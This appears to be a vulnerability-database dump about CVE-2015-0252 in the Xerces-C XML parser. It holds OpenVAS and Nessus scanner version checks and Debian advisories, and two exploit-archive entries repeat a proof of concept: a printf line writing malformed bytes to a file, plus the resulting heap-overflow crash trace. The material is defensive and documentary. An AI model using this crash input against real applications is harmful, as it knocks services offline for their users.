exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"xerces-c\", rpm:\"xerces-c~3.1.1~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-c-devel\", rpm:\"xerces-c-devel~3.1.1~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-c-doc\", rpm:\"xerces-c-doc~3.1.1~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:53:26", "bulletinFamily": "scanner", "description": "Anton Rager and Jonathan Brossard from\nthe Salesforce.com Product Security Team and Ben Laurie of Google discovered a\ndenial of service vulnerability in xerces-c, a validating XML parser library for\nC++. The parser mishandles certain kinds of malformed input documents, resulting\nin a segmentation fault during a parse operation. An unauthenticated\nattacker could use this flaw to cause an application using the\nxerces-c library to crash.", "modified": "2017-07-07T00:00:00", "published": "2015-03-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703199", "id": "OPENVAS:703199", "title": "Debian Security Advisory DSA 3199-1 (xerces-c - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3199.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3199-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703199);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-0252\");\n script_name(\"Debian Security Advisory DSA 3199-1 (xerces-c - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-20 00:00:00 +0100 (Fri, 20 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3199.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"xerces-c on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 3.1.1-3+deb7u1.\n\nWe recommend that you upgrade your xerces-c packages.\");\n script_tag(name: \"summary\", value: \"Anton Rager and Jonathan Brossard from\nthe Salesforce.com Product Security Team and Ben Laurie of Google discovered a\ndenial of service vulnerability in xerces-c, a validating XML parser library for\nC++. The parser mishandles certain kinds of malformed input documents, resulting\nin a segmentation fault during a parse operation. An unauthenticated\nattacker could use this flaw to cause an application using the\nxerces-c library to crash.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxerces-c-dev\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c-doc\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c-samples\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c3.1:amd64\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c3.1:i386\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:29", "bulletinFamily": "scanner", "description": "Check the version of xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-07-03T00:00:00", "id": "OPENVAS:1361412562310882212", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882212", "title": "CentOS Update for xerces-c CESA-2015:1193 centos7 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xerces-c CESA-2015:1193 centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882212\");\n script_version(\"$Revision: 6657 $\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-03 11:19:11 +0530 (Fri, 03 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for xerces-c CESA-2015:1193 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\n in a portable subset of C++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain XML\ndocuments. A remote attacker could provide specially crafted XML input\nthat, when parsed by an application using Xerces-C, would cause that\napplication to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package, which\ncontains a backported patch to correct this issue.\n\");\n script_tag(name: \"affected\", value: \"xerces-c on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:1193\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-June/021228.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-c\", rpm:\"xerces-c~3.1.1~7.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-c-devel\", rpm:\"xerces-c-devel~3.1.1~7.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-c-doc\", rpm:\"xerces-c-doc~3.1.1~7.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:56", "bulletinFamily": "scanner", "description": "Check the version of mingw-xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869142", "title": "Fedora Update for mingw-xerces-c FEDORA-2015-4228", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-xerces-c FEDORA-2015-4228\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869142\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:00 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mingw-xerces-c FEDORA-2015-4228\");\n script_tag(name: \"summary\", value: \"Check the version of mingw-xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\nin a portable subset of C++. Xerces-C makes it easy to give your application the\nability to read and write XML data. A shared library is provided for parsing,\ngenerating, manipulating, and validating XML documents. Xerces-C is faithful to\nthe XML 1.0 recommendation and associated standards\n(DOM 1.0, DOM 2.0. SAX 1.0, SAX 2.0, Namespaces).\n\");\n script_tag(name: \"affected\", value: \"mingw-xerces-c on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4228\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153887.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-xerces-c\", rpm:\"mingw-xerces-c~3.1.1~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:13", "bulletinFamily": "unix", "description": "Package : xerces-c\nVersion : 3.1.1-1+deb6u1\nCVE ID : CVE-2015-0252\nDebian Bug : 780827\n\nAnton Rager and Jonathan Brossard from the Salesforce.com Product\nSecurity Team and Ben Laurie of Google discovered a denial of service\nvulnerability in xerces-c, a validating XML parser library for C++. The\nparser mishandles certain kinds of malformed input documents, resulting\nin a segmentation fault during a parse operation. An unauthenticated\nattacker could use this flaw to cause an application using the\nxerces-c library to crash.\n", "modified": "2015-03-27T21:15:27", "published": "2015-03-27T21:15:27", "id": "DEBIAN:DLA-181-1:20BFE", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201503/msg00018.html", "title": "[SECURITY] [DLA 181-1] xerces-c security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-18T13:48:31", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3199-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMarch 20, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xerces-c\nCVE ID : CVE-2015-0252\nDebian Bug : 780827\n\nAnton Rager and Jonathan Brossard from the Salesforce.com Product\nSecurity Team and Ben Laurie of Google discovered a denial of service\nvulnerability in xerces-c, a validating XML parser library for C++. The\nparser mishandles certain kinds of malformed input documents, resulting\nin a segmentation fault during a parse operation. An unauthenticated\nattacker could use this flaw to cause an application using the\nxerces-c library to crash.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 3.1.1-3+deb7u1.\n\nWe recommend that you upgrade your xerces-c packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-03-20T18:36:58", "published": "2015-03-20T18:36:58", "id": "DEBIAN:DSA-3199-1:93400", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00084.html", "title": "[SECURITY] [DSA 3199-1] xerces-c security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-08T01:47:41", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "1337DAY-ID-23598", "href": "https://0day.today/exploit/description/23598", "type": "zdt", "title": "Apache Xerces-C XML Parser < 3.1.2 - DoS POC", "sourceData": "# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC\r\n# Date: 2015-05-03\r\n# Exploit Author: beford\r\n# Vendor Homepage: http://xerces.apache.org/#xerces-c\r\n# Version: Versions prior to 3.1.2\r\n# Tested on: Ubuntu 15.04\r\n# CVE : CVE-2015-0252\r\n \r\nApache Xerces-C XML Parser Crashes on Malformed Input\r\n \r\nI believe this to be the same issue that was reported on CVE-2015-0252,\r\nposting this in case anyone is interested in reproducing it.\r\n \r\nOriginal advisory:\r\nhttps://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt\r\n \r\n$ printf \"\\xff\\xfe\\x00\\x00\\x3c\" > file.xml\r\n \r\n$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package\r\nSegmentation fault\r\n \r\n$ ./DOMPrint ./file.xml # ASAN Enabled build\r\n=================================================================\r\n==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c\r\nat pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798\r\nREAD of size 1 at 0xb5d9d87c thread T0\r\n #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer()\r\nxercesc/internal/XMLReader.cpp:1719\r\n #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*,\r\nunsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761\r\n #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer()\r\nxercesc/internal/XMLReader.cpp:576\r\n #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short\r\nconst*) xercesc/internal/XMLReader.cpp:1223\r\n #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short\r\nconst*) xercesc/internal/ReaderMgr.hpp:385\r\n #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool)\r\nxercesc/internal/XMLScanner.cpp:1608\r\n #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog()\r\nxercesc/internal/XMLScanner.cpp:1244\r\n #7 0x8d69220 in\r\nxercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)\r\nxercesc/internal/IGXMLScanner.cpp:206\r\n #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short\r\nconst*) xercesc/internal/XMLScanner.cpp:400\r\n #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)\r\nxercesc/internal/XMLScanner.cpp:408\r\n #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)\r\nxercesc/parsers/AbstractDOMParser.cpp:601\r\n #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398\r\n #12 0xb6f5272d in __libc_start_main\r\n(/lib/i386-linux-gnu/libc.so.6+0x1872d)\r\n #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)\r\n \r\n0xb5d9d87c is located 0 bytes to the right of 163964-byte region\r\n[0xb5d75800,0xb5d9d87c)\r\nallocated by thread T0 here:\r\n #0 0xb72c3ae4 in operator new(unsigned int)\r\n(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)\r\n #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int)\r\nxercesc/internal/MemoryManagerImpl.cpp:40\r\n #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int,\r\nxercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68\r\n #3 0x8daaaa7 in\r\nxercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&)\r\nxercesc/internal/IGXMLScanner2.cpp:1284\r\n #4 0x8d6912a in\r\nxercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)\r\nxercesc/internal/IGXMLScanner.cpp:198\r\n #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short\r\nconst*) xercesc/internal/XMLScanner.cpp:400\r\n #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)\r\nxercesc/internal/XMLScanner.cpp:408\r\n #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)\r\nxercesc/parsers/AbstractDOMParser.cpp:601\r\n #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398\r\n #9 0xb6f5272d in __libc_start_main\r\n(/lib/i386-linux-gnu/libc.so.6+0x1872d)\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow\r\nxercesc/internal/XMLReader.cpp:1719\r\nxercesc_3_1::XMLReader::refreshRawBuffer()\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23598"}], "exploitdb": [{"lastseen": "2016-02-04T04:37:33", "bulletinFamily": "exploit", "description": "Apache Xerces-C XML Parser < 3.1.2 - DoS POC. CVE-2015-0252. Dos exploit for linux platform", "modified": "2015-05-04T00:00:00", "published": "2015-05-04T00:00:00", "id": "EDB-ID:36906", "href": "https://www.exploit-db.com/exploits/36906/", "type": "exploitdb", "title": "Apache Xerces-C XML Parser < 3.1.2 - DoS POC", "sourceData": "# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC\r\n# Date: 2015-05-03\r\n# Exploit Author: beford\r\n# Vendor Homepage: http://xerces.apache.org/#xerces-c\r\n# Version: Versions prior to 3.1.2\r\n# Tested on: Ubuntu 15.04\r\n# CVE : CVE-2015-0252\r\n\r\nApache Xerces-C XML Parser Crashes on Malformed Input\r\n\r\nI believe this to be the same issue that was reported on CVE-2015-0252,\r\nposting this in case anyone is interested in reproducing it.\r\n\r\nOriginal advisory:\r\nhttps://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt\r\n\r\n$ printf \"\\xff\\xfe\\x00\\x00\\x3c\" > file.xml\r\n\r\n$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package\r\nSegmentation fault\r\n\r\n$ ./DOMPrint ./file.xml # ASAN Enabled build\r\n=================================================================\r\n==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c\r\nat pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798\r\nREAD of size 1 at 0xb5d9d87c thread T0\r\n #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer()\r\nxercesc/internal/XMLReader.cpp:1719\r\n #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*,\r\nunsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761\r\n #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer()\r\nxercesc/internal/XMLReader.cpp:576\r\n #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short\r\nconst*) xercesc/internal/XMLReader.cpp:1223\r\n #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short\r\nconst*) xercesc/internal/ReaderMgr.hpp:385\r\n #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool)\r\nxercesc/internal/XMLScanner.cpp:1608\r\n #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog()\r\nxercesc/internal/XMLScanner.cpp:1244\r\n #7 0x8d69220 in\r\nxercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)\r\nxercesc/internal/IGXMLScanner.cpp:206\r\n #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short\r\nconst*) xercesc/internal/XMLScanner.cpp:400\r\n #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)\r\nxercesc/internal/XMLScanner.cpp:408\r\n #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)\r\nxercesc/parsers/AbstractDOMParser.cpp:601\r\n #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398\r\n #12 0xb6f5272d in __libc_start_main\r\n(/lib/i386-linux-gnu/libc.so.6+0x1872d)\r\n #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)\r\n\r\n0xb5d9d87c is located 0 bytes to the right of 163964-byte region\r\n[0xb5d75800,0xb5d9d87c)\r\nallocated by thread T0 here:\r\n #0 0xb72c3ae4 in operator new(unsigned int)\r\n(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)\r\n #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int)\r\nxercesc/internal/MemoryManagerImpl.cpp:40\r\n #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int,\r\nxercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68\r\n #3 0x8daaaa7 in\r\nxercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&)\r\nxercesc/internal/IGXMLScanner2.cpp:1284\r\n #4 0x8d6912a in\r\nxercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)\r\nxercesc/internal/IGXMLScanner.cpp:198\r\n #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short\r\nconst*) xercesc/internal/XMLScanner.cpp:400\r\n #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)\r\nxercesc/internal/XMLScanner.cpp:408\r\n #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)\r\nxercesc/parsers/AbstractDOMParser.cpp:601\r\n #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398\r\n #9 0xb6f5272d in __libc_start_main\r\n(/lib/i386-linux-gnu/libc.so.6+0x1872d)\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow\r\nxercesc/internal/XMLReader.cpp:1719\r\nxercesc_3_1::XMLReader::refreshRawBuffer()\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36906/"}], "nessus": [{"lastseen": "2019-02-21T01:24:26", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2015:1193 :\n\nAn updated xerces-c package that fixes one security issue is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nXerces-C is a validating XML parser written in a portable subset of C++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain XML documents. A remote attacker could provide specially crafted XML input that, when parsed by an application using Xerces-C, would cause that application to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package, which contains a backported patch to correct this issue.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2015-1193.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84463", "published": "2015-06-30T00:00:00", "title": "Oracle Linux 7 : xerces-c (ELSA-2015-1193)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1193 and \n# Oracle Linux Security Advisory ELSA-2015-1193 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84463);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:58\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"RHSA\", value:\"2015:1193\");\n\n script_name(english:\"Oracle Linux 7 : xerces-c (ELSA-2015-1193)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1193 :\n\nAn updated xerces-c package that fixes one security issue is now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nXerces-C is a validating XML parser written in a portable subset of\nC++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain\nXML documents. A remote attacker could provide specially crafted XML\ninput that, when parsed by an application using Xerces-C, would cause\nthat application to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package,\nwhich contains a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005182.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-c packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-c-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-c-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n 